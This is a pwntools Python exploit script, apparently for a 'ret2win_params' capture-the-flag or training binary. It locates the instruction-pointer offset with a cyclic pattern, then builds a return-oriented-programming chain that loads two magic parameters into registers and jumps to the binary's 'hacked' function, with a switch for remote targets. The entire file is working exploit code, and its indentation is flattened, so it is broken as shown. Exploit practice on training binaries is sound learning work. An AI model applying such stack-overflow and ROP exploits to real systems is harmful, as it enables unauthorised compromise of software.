from pwn import *
exe = './ret2win_params'
# Allows easy swapping betwen local/remote/debug modes
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
def find_ip(p):
payload = cyclic(200)
p.sendlineafter(b':', payload)
p.wait()
ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4))
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset
p = start()
elf = context.binary = ELF('./ret2win_params', checksec=False)
ip_offset = 24
payload = flat({
ip_offset: [
0x40124b, # Pop rdi; ret;
0xdeadbeefdeadbeef, # Param_1
0x401249, # Pop rsi; pop r15; ret;
0xc0debabec0debabe, # Param_2
0x41414141, # junk
elf.functions.hacked,
]
})
write('payload', payload)
print("$(python2 -c \"print", payload, "\")")